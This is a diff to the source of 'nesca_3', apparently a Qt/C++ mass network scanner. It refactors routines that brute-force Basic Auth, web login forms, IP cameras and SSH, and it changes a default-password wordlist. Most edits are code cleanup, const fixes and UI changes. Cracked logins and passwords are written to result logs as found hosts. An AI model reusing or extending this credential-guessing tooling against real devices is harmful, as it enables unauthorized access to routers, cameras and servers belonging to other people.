void putInFile(int flag, char *ip, char *port, int recd, char *finalstr, char *hl, char *cp)
|
||||
void putInFile(int flag, const char *ip, char *port, int recd, char *finalstr, char *hl, char *cp)
|
||||
{
|
||||
char log[4096] = {0}, msg[512] = {0};
|
||||
|
||||
if(flag == 0 || flag == 15 || flag == -10) strcpy(msg, "[A]:");
|
||||
else if(flag == 3) strcpy(msg, "[S]:");
|
||||
else if(flag == 7) strcpy(msg, "[LL]:");
|
||||
else if(flag == 2) strcpy(msg, "[P]:");
|
||||
else if(flag == 666 || flag == 350) strcpy(msg, "[Strange Error]:");
|
||||
else if(flag == 10) strcpy(msg, "[LF]:");
|
||||
|
||||
QTextCodec *codec;
|
||||
strcat(msg, "<a href=\"http://");
|
||||
strcat(msg, ip);
|
||||
strcat(msg, ":");
|
||||
strcat(msg, port);
|
||||
strcat(msg, "/\"><span style=\"color: #a1a1a1;\">");
|
||||
strcat(msg, ip);
|
||||
strcat(msg, ":");
|
||||
strcat(msg, port);
|
||||
strcat(msg, "</span></a>");
|
||||
sprintf(msg, "<a href=\"http://%s:%s/\"><span style=\"color: #a1a1a1;\">%s:%s</span></a>",
|
||||
ip, port, ip, port);
|
||||
|
||||
QString resMes(msg);
|
||||
QString strf;
|
||||
@ -715,7 +702,8 @@ void putInFile(int flag, char *ip, char *port, int recd, char *finalstr, char *h
|
||||
strf = codec->toUnicode(finalstr);
|
||||
}
|
||||
else strf = QString(finalstr);
|
||||
if(flag != 6 && flag != 5 && flag != 4 && flag != 666 && flag != 350)
|
||||
|
||||
if(flag != 6 && flag != 5 && flag != 4)
|
||||
{
|
||||
strcat(msg, " <font color=\"#0084ff\">: </font><font color=\"#ff9600\">");
|
||||
int sz = strf.size();
|
||||
@ -726,31 +714,8 @@ void putInFile(int flag, char *ip, char *port, int recd, char *finalstr, char *h
|
||||
|
||||
stt->doEmitionFoundData(resMes);
|
||||
|
||||
|
||||
strcpy(log, "<font color=GreenYellow>");
|
||||
strcat(log, hl);
|
||||
strcat(log, "</font>");
|
||||
int flr = 40 - strlen(hl);
|
||||
if(flr > 0)
|
||||
{
|
||||
while(flr != 0)
|
||||
{
|
||||
strcat(log, " ");
|
||||
--flr;
|
||||
};
|
||||
}
|
||||
else strcat(log, " ");
|
||||
strcat(log, "<span id=\"hostSpan\"><a href=\"http://");
|
||||
strcat(log, ip);
|
||||
strcat(log, ":");
|
||||
strcat(log, port);
|
||||
strcat(log, "\"/><font color=MediumSeaGreen>");
|
||||
strcat(log, ip);
|
||||
strcat(log, ":");
|
||||
strcat(log, port);
|
||||
strcat(log, "</font></a>;</span> <span id=\"recvSpan\">Received: <font color=SteelBlue>");
|
||||
strcat(log, std::to_string(recd).c_str());
|
||||
strcat(log, "</font>");
|
||||
sprintf(log, "<span id=\"hostSpan\"><a href=\"http://%s:%s\"/><font color=MediumSeaGreen>%s:%s</font></a>;</span> <span id=\"recvSpan\">Received: <font color=SteelBlue>%d</font>",
|
||||
ip, port, ip, port, recd);
|
||||
|
||||
if(flag == 666 || flag == 350)
|
||||
{
|
||||
@ -795,7 +760,7 @@ void putInFile(int flag, char *ip, char *port, int recd, char *finalstr, char *h
|
||||
ZeroMemory(msg, strlen(msg));
|
||||
}
|
||||
|
||||
void _specFillerBA(char *hl, char *ip, char *port, char *finalstr, const char *login, const char *pass, int flag)
|
||||
void _specFillerBA(char *hl, const char *ip, char *port, char *finalstr, const char *login, const char *pass, int flag)
|
||||
{
|
||||
char log[512] = {0};
|
||||
|
||||
@ -814,7 +779,7 @@ void _specFillerBA(char *hl, char *ip, char *port, char *finalstr, const char *l
|
||||
fputsf (log , flag, "Basic Authorization");
|
||||
}
|
||||
|
||||
void _specFillerWF(char *hl, char *ip, char *port, char *finalstr, char *login, char *pass, int flag)
|
||||
void _specFillerWF(char *hl, const char *ip, char *port, char *finalstr, char *login, char *pass, int flag)
|
||||
{
|
||||
char log[512] = {0};
|
||||
|
||||
@ -1025,7 +990,7 @@ void _getInputVal(std::vector<std::string> inputVec, char *buff, char *key)
|
||||
};
|
||||
}
|
||||
|
||||
void _specWFBrute(char *ip, int port, char *hl, const char *buff, int flag, char *path, char *comment, char *tclass, char *cp, int recd, char *title)
|
||||
void _specWFBrute(const char *ip, int port, char *hl, const char *buff, int flag, char *path, char *comment, char *tclass, char *cp, int recd, char *title)
|
||||
{
|
||||
if(strstr(buff, "VER_CODE") != NULL || strstri(buff, "captcha") != NULL)
|
||||
{
|
||||
@ -1194,7 +1159,7 @@ void _specWFBrute(char *ip, int port, char *hl, const char *buff, int flag, char
|
||||
};
|
||||
}
|
||||
|
||||
void _specWEBIPCAMBrute(char *ip, int port, char *hl, char *finalstr, int flag, char *comment, char *cp, int recd, char *SPEC)
|
||||
void _specWEBIPCAMBrute(const char *ip, int port, char *hl, char *finalstr, int flag, char *comment, char *cp, int recd, char *SPEC)
|
||||
{
|
||||
lopaStr lps;
|
||||
ZeroMemory(lps.login, sizeof(lps.login));
|
||||
@ -1213,7 +1178,7 @@ void _specWEBIPCAMBrute(char *ip, int port, char *hl, char *finalstr, int flag,
|
||||
};
|
||||
}
|
||||
|
||||
void _specBrute(char *cookie, char *ip, int port,
|
||||
void _specBrute(char *cookie, const char *ip, int port,
|
||||
char *hl, char *finalstr, int flag,
|
||||
char *path, char *comment, char *cp, int recd)
|
||||
{
|
||||
@ -1222,10 +1187,7 @@ void _specBrute(char *cookie, char *ip, int port,
|
||||
sprintf(tport, ":%d", port);
|
||||
|
||||
const lopaStr &lps = BA::_BALobby((string(ip) + string(path)).c_str(), port);
|
||||
|
||||
//if(strcmp(comment, "[DIGEST]") == 0) lps = _BALobby(cookie, ip, port, path, "[DIGEST]");
|
||||
//else lps = _BALobby(cookie, ip, port, path, "[NORMAL]");
|
||||
|
||||
|
||||
if(strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0)
|
||||
{
|
||||
_specFillerBA(hl, ip, tport, finalstr, lps.login, lps.pass, flag);
|
||||
@ -1352,7 +1314,7 @@ const char *GetTitle(const char* str)
|
||||
return finalstr;
|
||||
}
|
||||
|
||||
void _saveSSH(char *ip, int port, int recd, const char *buffcpy)
|
||||
void _saveSSH(const char *ip, int port, int recd, const char *buffcpy)
|
||||
{
|
||||
if(buffcpy != NULL)
|
||||
{
|
||||
@ -1442,7 +1404,9 @@ int Lexems::_filler(int p, const char* buffcpy, char* ip, int recd, Lexems *lx,
|
||||
{
|
||||
int rh = _header(ip, p, buffcpy, lx, &ps, &redirStrLst);
|
||||
strcpy(cp, ps.codepage);
|
||||
if (rh == -1) return -1;
|
||||
if (rh == -1) {
|
||||
return -1;
|
||||
}
|
||||
if(rh <= -2)
|
||||
{
|
||||
flag = ps.flag;
|
||||
@ -1462,7 +1426,9 @@ int Lexems::_filler(int p, const char* buffcpy, char* ip, int recd, Lexems *lx,
|
||||
sprintf(port, "%d", p);
|
||||
|
||||
if(strstr(finalstr, ps.headr) == NULL) strcat(finalstr, ps.headr);
|
||||
if(flag == -1 || flag == 6) return -1;
|
||||
if (flag == -1 || flag == 6) {
|
||||
return -1;
|
||||
}
|
||||
|
||||
if(flag == 16)
|
||||
{
|
||||
@ -2558,59 +2524,59 @@ int Lexems::_header(char *ip, int port, const char str[], Lexems *l, PathStr *ps
|
||||
return -2;
|
||||
};
|
||||
|
||||
if(strstri(str, "<form ") != NULL)
|
||||
{
|
||||
strcat(ps->headr, " [Login form detected]");
|
||||
char *ptr1 = strstri(str, "<form");
|
||||
char *ptr2 = strstri(ptr1, "action");
|
||||
if(ptr2 != NULL)
|
||||
{
|
||||
char *ptr3 = strstri(ptr2, "=");
|
||||
if(ptr3 != NULL)
|
||||
{
|
||||
char *ptr4 = NULL;
|
||||
char *ptrEnd = NULL;
|
||||
int sz = 0;
|
||||
char redirStr[512] = {0};
|
||||
if(ptr3[1] == ' ' || ptr3[1] == '"' || ptr3[1] == '\"')
|
||||
{
|
||||
ptr4 = _findFirst(ptr3, " \"'\n\r");
|
||||
if(ptr4 != NULL)
|
||||
{
|
||||
ptrEnd = _findFirst(ptr4 + 1, " \"'\n\r");
|
||||
if(ptrEnd != NULL)
|
||||
{
|
||||
sz = ptrEnd - ptr4 - 1;
|
||||
strncpy(redirStr, ptr4 + 1, sz < 512 ? sz : 512);
|
||||
};
|
||||
};
|
||||
}
|
||||
else
|
||||
{
|
||||
ptrEnd = _findFirst(ptr3, " \"'\n\r");
|
||||
if(ptrEnd != NULL)
|
||||
{
|
||||
sz = ptrEnd - ptr3 - 1;
|
||||
strncpy(redirStr, ptr3 + 1, sz < 512 ? sz : 512);
|
||||
};
|
||||
};
|
||||
//if(strstri(str, "<form ") != NULL)
|
||||
//{
|
||||
// strcat(ps->headr, " [Login form detected]");
|
||||
// char *ptr1 = strstri(str, "<form");
|
||||
// char *ptr2 = strstri(ptr1, "action");
|
||||
// if(ptr2 != NULL)
|
||||
// {
|
||||
// char *ptr3 = strstri(ptr2, "=");
|
||||
// if(ptr3 != NULL)
|
||||
// {
|
||||
// char *ptr4 = NULL;
|
||||
// char *ptrEnd = NULL;
|
||||
// int sz = 0;
|
||||
// char redirStr[512] = {0};
|
||||
// if(ptr3[1] == ' ' || ptr3[1] == '"' || ptr3[1] == '\"')
|
||||
// {
|
||||
// ptr4 = _findFirst(ptr3, " \"'\n\r");
|
||||
// if(ptr4 != NULL)
|
||||
// {
|
||||
// ptrEnd = _findFirst(ptr4 + 1, " \"'\n\r");
|
||||
// if(ptrEnd != NULL)
|
||||
// {
|
||||
// sz = ptrEnd - ptr4 - 1;
|
||||
// strncpy(redirStr, ptr4 + 1, sz < 512 ? sz : 512);
|
||||
// };
|
||||
// };
|
||||
// }
|
||||
// else
|
||||
// {
|
||||
// ptrEnd = _findFirst(ptr3, " \"'\n\r");
|
||||
// if(ptrEnd != NULL)
|
||||
// {
|
||||
// sz = ptrEnd - ptr3 - 1;
|
||||
// strncpy(redirStr, ptr3 + 1, sz < 512 ? sz : 512);
|
||||
// };
|
||||
// };
|
||||
|
||||
if (redirStr[0] != '#') {
|
||||
if (std::find(redirStrLst->begin(), redirStrLst->end(), redirStr) == redirStrLst->end())
|
||||
{
|
||||
redirStrLst->push_back(redirStr);
|
||||
return redirectReconnect(ps->cookie, ip, port, redirStr, l, ps, redirStrLst);
|
||||
} return -1;
|
||||
}
|
||||
return -2;
|
||||
};
|
||||
}
|
||||
else
|
||||
{
|
||||
strcat(ps->headr, " [Form action not found]");
|
||||
};
|
||||
return 0;
|
||||
};
|
||||
// if (redirStr[0] != '#') {
|
||||
// if (std::find(redirStrLst->begin(), redirStrLst->end(), redirStr) == redirStrLst->end())
|
||||
// {
|
||||
// redirStrLst->push_back(redirStr);
|
||||
// return redirectReconnect(ps->cookie, ip, port, redirStr, l, ps, redirStrLst);
|
||||
// } return -1;
|
||||
// }
|
||||
// return -2;
|
||||
// };
|
||||
// }
|
||||
// else
|
||||
// {
|
||||
// strcat(ps->headr, " [Form action not found]");
|
||||
// };
|
||||
// return 0;
|
||||
//};
|
||||
|
||||
if(strlen(ps->headr) == 0)
|
||||
{
|
||||
@ -2624,29 +2590,27 @@ int Lexems::_header(char *ip, int port, const char str[], Lexems *l, PathStr *ps
|
||||
strcat(ps->headr, "[No body]");
|
||||
};
|
||||
|
||||
if(strstr(str, "\r\n\r\n") != NULL)
|
||||
const char *ptr1 = strstr(str, "\r\n\r\n");
|
||||
if( ptr1 != NULL)
|
||||
{
|
||||
const char *tempStr = strstr(str, "\r\n\r\n");
|
||||
if(strlen(tempStr) - 4 >= 250)
|
||||
if (strlen(ptr1) - 4 >= 15)
|
||||
{
|
||||
if(strstr(str, "Content-Encoding: gzip") != NULL)
|
||||
{
|
||||
strcat(ps->headr, "[GZIP]");
|
||||
};
|
||||
strcat(ps->headr, " [Data: ");
|
||||
if(strstri(tempStr + 4, "<body") != NULL)
|
||||
|
||||
char *ptr2 = strstri(ptr1 + 4, "<body");
|
||||
if (ptr2 != NULL)
|
||||
{
|
||||
strncat(ps->headr, strstri(tempStr, "<body") + 5, 64);
|
||||
strncat(ps->headr, ptr2 + 5, 64);
|
||||
}
|
||||
else if(strstri(tempStr + 4, "<html") != NULL)
|
||||
{
|
||||
strncat(ps->headr, strstri(tempStr, "<html") + 5, 64);
|
||||
}
|
||||
else if(strstri(tempStr + 4, "</style>") != NULL)
|
||||
{
|
||||
strncat(ps->headr, strstri(tempStr, "</style>") + 8, 64);
|
||||
}
|
||||
else strncat(ps->headr, tempStr + 4, 64);
|
||||
else {
|
||||
ptr2 = strstri(ptr1 + 4, "<html");
|
||||
if (ptr2 != NULL)
|
||||
{
|
||||
strncat(ps->headr, strstri(ptr1, "<html") + 5, 64);
|
||||
}
|
||||
else strncat(ps->headr, ptr1 + 4, 64);
|
||||
};
|
||||
|
||||
strcat(ps->headr, "]");
|
||||
}
|
||||
else
|
||||
@ -2658,7 +2622,7 @@ int Lexems::_header(char *ip, int port, const char str[], Lexems *l, PathStr *ps
|
||||
|
||||
++Filt;
|
||||
strcpy(ps->path, "/");
|
||||
return 0;
|
||||
return -1;
|
||||
};
|
||||
}
|
||||
else
|
||||
|
@ -4,7 +4,6 @@ root
|
||||
123456
|
||||
12345
|
||||
|
||||
|
||||
cisco
|
||||
super
|
||||
meinsm
|
||||
@ -22,6 +21,8 @@ telecom
|
||||
dreambox
|
||||
master
|
||||
Admin
|
||||
Root
|
||||
guest
|
||||
backup
|
||||
backup
|
||||
cgadmin
|
||||
0000
|
||||
1111
|
124
mainResources.h
124
mainResources.h
@ -1,4 +1,4 @@
|
||||
#pragma once
|
||||
#pragma once
|
||||
#include "base64.h"
|
||||
|
||||
#include <libssh/libssh.h>
|
||||
@ -103,8 +103,8 @@ struct PathStr{
|
||||
};
|
||||
|
||||
struct lopaStr{
|
||||
char login[128];
|
||||
char pass[32];
|
||||
char login[128];
|
||||
char pass[32];
|
||||
char other[128];
|
||||
};
|
||||
|
||||
@ -115,78 +115,78 @@ struct conSTR{
|
||||
};
|
||||
|
||||
class Lexems
|
||||
{
|
||||
public:
|
||||
int iterationCount, flag;
|
||||
|
||||
Lexems()
|
||||
{
|
||||
public:
|
||||
int iterationCount, flag;
|
||||
iterationCount = 0;
|
||||
flag = 0;
|
||||
}
|
||||
|
||||
Lexems()
|
||||
{
|
||||
iterationCount = 0;
|
||||
flag = 0;
|
||||
}
|
||||
~Lexems()
|
||||
{
|
||||
iterationCount = 0;
|
||||
}
|
||||
|
||||
~Lexems()
|
||||
{
|
||||
iterationCount = 0;
|
||||
}
|
||||
|
||||
int _header(char *ip,
|
||||
int port,
|
||||
const char str[],
|
||||
Lexems *l,
|
||||
PathStr *ps,
|
||||
std::vector<std::string> *lst);
|
||||
int _header(char *ip,
|
||||
int port,
|
||||
const char str[],
|
||||
Lexems *l,
|
||||
PathStr *ps,
|
||||
std::vector<std::string> *lst);
|
||||
|
||||
int _filler(int p,
|
||||
const char *buffcpy,
|
||||
char* ipi,
|
||||
int recd,
|
||||
Lexems *lx,
|
||||
char *hl);
|
||||
};
|
||||
int _filler(int port,
|
||||
const char *buffcpy,
|
||||
char* ip,
|
||||
int recd,
|
||||
Lexems *lx,
|
||||
char *hl);
|
||||
};
|
||||
|
||||
|
||||
class Connector_old
|
||||
{
|
||||
public:
|
||||
int _Updater();
|
||||
|
||||
// lopaStr _FTPLobby(char *ip,
|
||||
// int port,
|
||||
// PathStr *ps);
|
||||
{
|
||||
public:
|
||||
int _Updater();
|
||||
|
||||
// lopaStr _BALobby(char *cookie,
|
||||
// char *ip,
|
||||
// int port,
|
||||
// char *path,
|
||||
// char *method,
|
||||
// char *data);
|
||||
// lopaStr _FTPLobby(char *ip,
|
||||
// int port,
|
||||
// PathStr *ps);
|
||||
|
||||
lopaStr _WFLobby(char *cookie,
|
||||
char *ip,
|
||||
int port,
|
||||
char *methodVal,
|
||||
char *actionVal,
|
||||
char *userVal,
|
||||
char *passVal,
|
||||
char *formVal);
|
||||
// lopaStr _BALobby(char *cookie,
|
||||
// char *ip,
|
||||
// int port,
|
||||
// char *path,
|
||||
// char *method,
|
||||
// char *data);
|
||||
|
||||
lopaStr _IPCameraBLobby(char *ip,
|
||||
int port,
|
||||
char *SPEC);
|
||||
lopaStr _WFLobby(char *cookie,
|
||||
char *ip,
|
||||
int port,
|
||||
char *methodVal,
|
||||
char *actionVal,
|
||||
char *userVal,
|
||||
char *passVal,
|
||||
char *formVal);
|
||||
|
||||
int _SSHLobby(char *ip,
|
||||
int port,
|
||||
std::string *buffer);
|
||||
|
||||
void _Connect(void *s);
|
||||
lopaStr _IPCameraBLobby(char *ip,
|
||||
int port,
|
||||
char *SPEC);
|
||||
|
||||
int _ConnectToPort(char *ip,
|
||||
int port,
|
||||
char *hl);
|
||||
};
|
||||
int _SSHLobby(char *ip,
|
||||
int port,
|
||||
std::string *buffer);
|
||||
|
||||
void _Connect(void *s);
|
||||
|
||||
int _ConnectToPort(char *ip,
|
||||
int port,
|
||||
char *hl);
|
||||
};
|
||||
|
||||
|
||||
extern lopaStr _IPCameraBLobby(char *ip, int port, char *SPEC);
|
||||
extern lopaStr _IPCameraBLobby(const char *ip, int port, char *SPEC);
|
||||
//extern lopaStr _BALobby(char *cookie, char *ip, int port, char *path, char *method);
|
||||
//extern lopaStr _FTPLobby(char *ip, int port, PathStr *ps);
|
||||
|
@ -1,8 +1,8 @@
|
||||
#include "msgcheckerthread.h"
|
||||
#include "externData.h"
|
||||
#include "mainResources.h"
|
||||
#include <Utils.h>
|
||||
#include <Connector.h>
|
||||
#include "Utils.h"
|
||||
#include "Connector.h"
|
||||
|
||||
void MSGCheckerThread::doEmitionShowNewMsg(QString str)
|
||||
{
|
||||
|
@ -292,7 +292,6 @@ domain has been registered
|
||||
domain name registration
|
||||
domain registered
|
||||
domainapps.com
|
||||
sale
|
||||
domeny
|
||||
domeingeregistreerd
|
||||
down for maint
|
||||
|
41
nesca_3.cpp
41
nesca_3.cpp
@ -746,19 +746,20 @@ void nesca_3::slotAddPolyLine()
|
||||
if(ME2ScanFlag)
|
||||
{
|
||||
QPainterPath path;
|
||||
if (DrawerTh_ME2Scanner::polyVect.size() > 0)
|
||||
if (DrawerTh_ME2Scanner::vecSize > 0)
|
||||
{
|
||||
path.moveTo(DrawerTh_ME2Scanner::polyVect[0]);
|
||||
for (int i = 1; i < DrawerTh_ME2Scanner::polyVect.size(); ++i)
|
||||
for (int i = 1; i < DrawerTh_ME2Scanner::vecSize; ++i)
|
||||
{
|
||||
path.lineTo(DrawerTh_ME2Scanner::polyVect[i]);
|
||||
};
|
||||
};
|
||||
|
||||
|
||||
QGraphicsPathItem* itm = new QGraphicsPathItem(path);
|
||||
itm->setPen(pen2i);
|
||||
sceneGraph->addItem(itm);
|
||||
DrawerTh_ME2Scanner::itmList.push_front(itm);
|
||||
DrawerTh_ME2Scanner::itmList.push_front(itm);
|
||||
DrawerTh_ME2Scanner::polyVect.clear();
|
||||
|
||||
int u = 0;
|
||||
double uu = 1.0;
|
||||
@ -778,7 +779,6 @@ void nesca_3::slotAddPolyLine()
|
||||
delete DrawerTh_ME2Scanner::itmList[38];
|
||||
DrawerTh_ME2Scanner::itmList.pop_back();
|
||||
};
|
||||
|
||||
};
|
||||
}
|
||||
|
||||
@ -1484,7 +1484,7 @@ void nesca_3::CheckPersKey()
|
||||
|
||||
if(!chKTh->isRunning())
|
||||
{
|
||||
stt->doEmitionYellowFoundData("[Key check] Starting checker-thread...");
|
||||
stt->doEmitionYellowFoundData("[Key check] Starting checker thread...");
|
||||
chKTh->start();
|
||||
}
|
||||
else
|
||||
@ -1500,7 +1500,7 @@ void nesca_3::CheckPersKey(int val = -1)
|
||||
|
||||
if(!chKTh->isRunning())
|
||||
{
|
||||
stt->doEmitionYellowFoundData("[Key check] Starting checker-thread...");
|
||||
stt->doEmitionYellowFoundData("[Key check] Starting checker thread...");
|
||||
chKTh->start();
|
||||
}
|
||||
else
|
||||
@ -1875,7 +1875,7 @@ void nesca_3::slotIRCGetTopic(QString str)
|
||||
|
||||
int c = 1;
|
||||
|
||||
void nesca_3::slotSaveImage()
|
||||
void nesca_3::slotSaveImage(QAction *qwe)
|
||||
{
|
||||
QObject *smB = this->sender();
|
||||
int ci = ui->tabMainWidget->currentIndex();
|
||||
@ -1960,7 +1960,7 @@ void PieStatView::contextMenuEvent(QContextMenuEvent *event)
|
||||
menuPS->addAction("Save image.");
|
||||
menuPS->popup(event->globalPos());
|
||||
|
||||
connect(menuPS, SIGNAL(triggered()), gthis, SLOT(slotSaveImage()));
|
||||
connect(menuPS, SIGNAL(triggered(QAction *)), gthis, SLOT(slotSaveImage(QAction *)));
|
||||
}
|
||||
|
||||
QLabel *msgLbl;
|
||||
@ -3158,9 +3158,9 @@ void RestoreSession()
|
||||
if (strstr(resStr, "[TIMEOUT]:") != NULL) {
|
||||
const QString &tempLex = loadNescaSetup(resStr, "[TIMEOUT]:");
|
||||
if(tempLex.toInt() > 0) {
|
||||
ui->iptoLine_value->setText(tempLex);
|
||||
ui->iptoLine_value_2->setText(tempLex);
|
||||
ui->iptoLine_value_3->setText(tempLex);
|
||||
ui->iptoLine_value->setText(tempLex.simplified());
|
||||
ui->iptoLine_value_2->setText(tempLex.simplified());
|
||||
ui->iptoLine_value_3->setText(tempLex.simplified());
|
||||
}
|
||||
}
|
||||
setUIText("[MAXBTHR]:", ui->maxBrutingThrBox, resStr);
|
||||
@ -3236,7 +3236,7 @@ const char *GetVer()
|
||||
char db[32] = {0};
|
||||
sprintf(db, "%X-%X", dver, tver);
|
||||
|
||||
return std::string(db).c_str();
|
||||
return db;
|
||||
}
|
||||
|
||||
void nesca_3::slotShowRedVersion()
|
||||
@ -3280,9 +3280,8 @@ void _startMsgCheck()
|
||||
|
||||
ui->ircNickBox->setText("nsa_" + QString::number(qrand() % 8999 + 1000));
|
||||
|
||||
const char *rVer = GetVer();
|
||||
QString QVER(rVer);
|
||||
strcpy(gVER, QVER.toLatin1().data());
|
||||
strcpy(gVER, GetVer());
|
||||
QString QVER(gVER);
|
||||
ui->logoLabel->setToolTip("v3-" + QVER);
|
||||
ui->logoLabel->setStyleSheet("color:white; border: none;background-color:black;");
|
||||
ui->newMessageLabel->setStyleSheet("color:rgba(255, 0, 0, 0);background-color: rgba(2, 2, 2, 0);");
|
||||
@ -3304,7 +3303,7 @@ void _startMsgCheck()
|
||||
if (WSAStartup(0x0101, &wsda))
|
||||
{
|
||||
stt->doEmitionRedFoundData("WSAStartup failed.");
|
||||
stt->doEmitionKillSttThread();
|
||||
qApp->quit();
|
||||
};
|
||||
#endif
|
||||
|
||||
@ -3343,8 +3342,7 @@ void nesca_3::mouseMoveEvent(QMouseEvent * event)
|
||||
|
||||
void nesca_3::exitButtonClicked()
|
||||
{
|
||||
globalScanFlag = false;
|
||||
stt->terminate();
|
||||
STTTerminate();
|
||||
#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
|
||||
WSACleanup();
|
||||
#endif
|
||||
@ -3399,12 +3397,10 @@ void nesca_3::STTTerminate()
|
||||
importFileName = "";
|
||||
startFlag = false;
|
||||
globalScanFlag = false;
|
||||
|
||||
stt->terminate();
|
||||
nCleanup();
|
||||
|
||||
while(__savingBackUpFile) Sleep(100);
|
||||
|
||||
nCleanup();
|
||||
ui->tabMainWidget->setTabEnabled(0, true);
|
||||
ui->tabMainWidget->setTabEnabled(1, true);
|
||||
ui->tabMainWidget->setTabEnabled(2, true);
|
||||
@ -3419,6 +3415,7 @@ void nesca_3::STTTerminate()
|
||||
ui->startScanButton_4->setText("Start");
|
||||
ui->importButton->setText("Import&&Scan");
|
||||
ui->labelStatus_Value->setText("Idle");
|
||||
stt->terminate();
|
||||
}
|
||||
|
||||
bool dfLocked = false;
|
||||
|
@ -21,7 +21,7 @@
|
||||
#include <qtextcodec.h>
|
||||
#include <qjsondocument.h>
|
||||
#include <libssh/libssh.h>
|
||||
#include <mainResources.h>
|
||||
#include "mainResources.h"
|
||||
|
||||
extern Ui::nesca_3Class *ui;
|
||||
extern bool widgetIsHidden, IRCLogToggled, blinkFlag, disableBlink, debugFileOK, QOSWait,
|
||||
@ -89,7 +89,7 @@ protected:
|
||||
void slotOutData(QString str);
|
||||
void slotIncData(QString ip, QString str);
|
||||
void slotShowServerMsg(QString str);
|
||||
void slotSaveImage();
|
||||
void slotSaveImage(QAction *qwe);
|
||||
void slotUpdatePie();
|
||||
void slotClearLogs();
|
||||
void slotRestartIRC();
|
||||
|
48
nesca_3.pri
48
nesca_3.pri
@ -1,48 +0,0 @@
|
||||
# ----------------------------------------------------
|
||||
# This file is generated by the Qt Visual Studio Add-in.
|
||||
# ------------------------------------------------------
|
||||
|
||||
# This is a reminder that you are using a generated .pro file.
|
||||
# Remove it when you are finished editing this file.
|
||||
message("You are running qmake on a generated .pro file. This may not work!")
|
||||
|
||||
|
||||
HEADERS += ./base64.h \
|
||||
./resource.h \
|
||||
./nesca_3.h \
|
||||
./ActivityDrawerTh_HorNet.h \
|
||||
./STh.h \
|
||||
./CheckKey_Th.h \
|
||||
./DrawerTh_QoSScanner.h \
|
||||
./CheckProxy_Th.h \
|
||||
./DrawerTh_HorNet.h \
|
||||
./DrawerTh_GridQoSScanner.h \
|
||||
./DrawerTh_VoiceScanner.h \
|
||||
./DrawerTh_ME2Scanner.h \
|
||||
./darkmap.h \
|
||||
./IRCPinger_Th.h \
|
||||
./oIRC_Th.h \
|
||||
./irc_nmblinker.h \
|
||||
./msgpopup.h
|
||||
SOURCES += ./ActivityDrawerTh_HorNet.cpp \
|
||||
./base64.cpp \
|
||||
./CheckKey_Th.cpp \
|
||||
./CheckProxy_Th.cpp \
|
||||
./connector.cpp \
|
||||
./darkmap.cpp \
|
||||
./DrawerTh_GridQoSScanner.cpp \
|
||||
./DrawerTh_HorNet.cpp \
|
||||
./DrawerTh_ME2Scanner.cpp \
|
||||
./DrawerTh_QoSScanner.cpp \
|
||||
./DrawerTh_VoiceScanner.cpp \
|
||||
./finder.cpp \
|
||||
./IRCPinger_Th.cpp \
|
||||
./irc_nmblinker.cpp \
|
||||
./main.cpp \
|
||||
./msgpopup.cpp \
|
||||
./nesca_3.cpp \
|
||||
./nesca_startModule.cpp \
|
||||
./oIRC_Th.cpp \
|
||||
./STh.cpp
|
||||
FORMS += ./nesca_3.ui
|
||||
RESOURCES += nesca_3.qrc
|
20
nesca_3.pro
20
nesca_3.pro
@ -1,20 +0,0 @@
|
||||
# ----------------------------------------------------
|
||||
# This file is generated by the Qt Visual Studio Add-in.
|
||||
# ------------------------------------------------------
|
||||
|
||||
TEMPLATE = app
|
||||
TARGET = nesca_3
|
||||
DESTDIR = ../Win32/Release
|
||||
QT += core widgets gui qml
|
||||
CONFIG += release
|
||||
DEFINES += QT_DLL QT_WIDGETS_LIB QT_QML_LIB
|
||||
INCLUDEPATH += ./GeneratedFiles \
|
||||
. \
|
||||
../../../../../../../../Qt/Qt5.0.0/5.0.0/msvc2010/bin
|
||||
DEPENDPATH += .
|
||||
MOC_DIR += C:/Qt/Qt5.0.0/5.0.0/msvc2010/bin
|
||||
OBJECTS_DIR += release
|
||||
UI_DIR += ./GeneratedFiles
|
||||
RCC_DIR += ./GeneratedFiles
|
||||
include(nesca_3.pri)
|
||||
win32:RC_FILE = nesca_3.rc
|
BIN
nesca_3.rc
BIN
nesca_3.rc
Binary file not shown.
15
nesca_3.ui
15
nesca_3.ui
@ -1749,7 +1749,10 @@ border-radius: 3px;</string>
|
||||
<property name="font">
|
||||
<font>
|
||||
<family>Eurostile</family>
|
||||
<pointsize>9</pointsize>
|
||||
<pointsize>8</pointsize>
|
||||
<weight>50</weight>
|
||||
<bold>false</bold>
|
||||
<underline>false</underline>
|
||||
</font>
|
||||
</property>
|
||||
<property name="styleSheet">
|
||||
@ -1780,8 +1783,8 @@ border-radius: 3px;</string>
|
||||
<string><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
|
||||
<html><head><meta name="qrichtext" content="1" /><style type="text/css">
|
||||
p, li { white-space: pre-wrap; }
|
||||
</style></head><body style=" font-family:'Eurostile'; font-size:9pt; font-weight:400; font-style:normal;">
|
||||
<p style="-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:'MS Shell Dlg 2'; font-size:8pt;"><br /></p></body></html></string>
|
||||
</style></head><body style=" font-family:'Eurostile'; font-size:8pt; font-weight:400; font-style:normal;">
|
||||
<p style="-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-family:'Verdana'; font-size:6pt;"><br /></p></body></html></string>
|
||||
</property>
|
||||
<property name="cursorWidth">
|
||||
<number>5</number>
|
||||
@ -2543,7 +2546,7 @@ p, li { white-space: pre-wrap; }
|
||||
<string><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
|
||||
<html><head><meta name="qrichtext" content="1" /><style type="text/css">
|
||||
p, li { white-space: pre-wrap; }
|
||||
</style></head><body style=" font-family:'Eurostile'; font-size:11pt; font-weight:400; font-style:normal;">
|
||||
</style></head><body style=" font-family:'Eurostile'; font-size:8.25pt; font-weight:400; font-style:normal;">
|
||||
<p style="-qt-paragraph-type:empty; margin-top:0px; margin-bottom:0px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; font-size:8pt;"><br /></p></body></html></string>
|
||||
</property>
|
||||
<property name="cursorWidth">
|
||||
@ -3527,7 +3530,7 @@ background-color: #000000;</string>
|
||||
